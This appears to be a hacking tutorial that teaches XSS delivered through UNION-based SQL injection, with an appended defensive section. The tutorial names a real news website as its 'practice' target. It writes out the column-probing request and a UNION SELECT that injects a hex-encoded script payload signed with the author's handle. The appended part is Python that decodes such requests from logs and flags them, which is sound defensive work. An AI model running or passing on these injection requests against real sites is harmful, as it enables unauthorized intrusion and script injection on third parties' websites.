In this tutorial you will learn the XSS attack via SQL injection.
If you are new to XSS, I suggest you first read the basics in the previous tutorial to learn how it works and what an attacker can do with an XSS vulnerability. Once you have basic knowledge of XSS attacks, you will be better able to understand this tutorial, "XSS with SQL Injection".
In an XSS attack via SQL injection, we execute our XSS payloads in a UNION-based query.
For example:
Suppose we have found a website which is vulnerable to SQL injection and can inject into its database queries. There we can also execute our XSS payloads in our UNION-based query. Let's take a site for practice.
Here is the target site:
http://www.lokmat.com/storypage.php?catid=31&newsid=3448
After counting the columns, there are 9 columns in total. So let's prepare our UNION-based query and execute it.
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,3,4,5,6,7,8,9--+
The 3rd column is printed on the page as output, so we will execute our XSS payload in that column.
Here is the XSS payload that we are going to inject into the UNION-based query:
XSS payload: <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this payload we need to encode it as a hex value (use HackBar).
Hex value: 0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's insert this payload into our UNION-based query and execute the query:
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
Output:
This payload will display an XSS pop-up alert.
Enjoy
This is the basic XSS payload; you can try more payloads, which will be posted in the next tutorial.
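A defender's view of the request above, as an added example that is not part of the original tutorial: the script markup never appears literally in the logged request because it is hex-encoded, so this Python check URL-decodes the query, decodes MySQL-style 0x literals, and flags a UNION SELECT that carries HTML. The function names, verdict labels and sample log entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log request targets; the last two reuse the requests shown above.
SAMPLE_REQUESTS = [
    "/storypage.php?catid=31&newsid=3448",
    "/storypage.php?catid=31&newsid=3448'union select 1,2,3,4,5,6,7,8,9--+",
    "/storypage.php?catid=31&newsid=3448'union select 1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+",
]

UNION_RE = re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)  # MySQL-style hex string literal
TAG_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I)       # any HTML tag


def decode_hex_literals(text):
    """Decode every 0x... literal in `text` to the string MySQL would return."""
    return [bytes.fromhex(m.group(1)).decode("utf-8", "replace")
            for m in HEX_RE.finditer(text)]


def inspect_request(request_target):
    """Classify one request target after URL-decoding and hex-decoding its query."""
    query = unquote_plus(urlsplit(request_target).query)
    markup = [d for d in decode_hex_literals(query) if TAG_RE.search(d)]
    has_union = bool(UNION_RE.search(query))
    if has_union and markup:
        verdict = "sqli+xss"   # UNION SELECT carrying hex-encoded HTML
    elif has_union:
        verdict = "sqli"       # UNION SELECT without markup (column probing)
    elif markup or TAG_RE.search(query):
        verdict = "xss"        # markup in the query, no UNION SELECT
    else:
        verdict = "clean"
    return {"verdict": verdict, "decoded_markup": markup}


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        result = inspect_request(target)
        print(result["verdict"].ljust(9), target[:60], result["decoded_markup"])
```

Detection of this kind only narrows the search in logs; the underlying fix is a parameterized query for newsid and HTML-escaping of every database value written into the page.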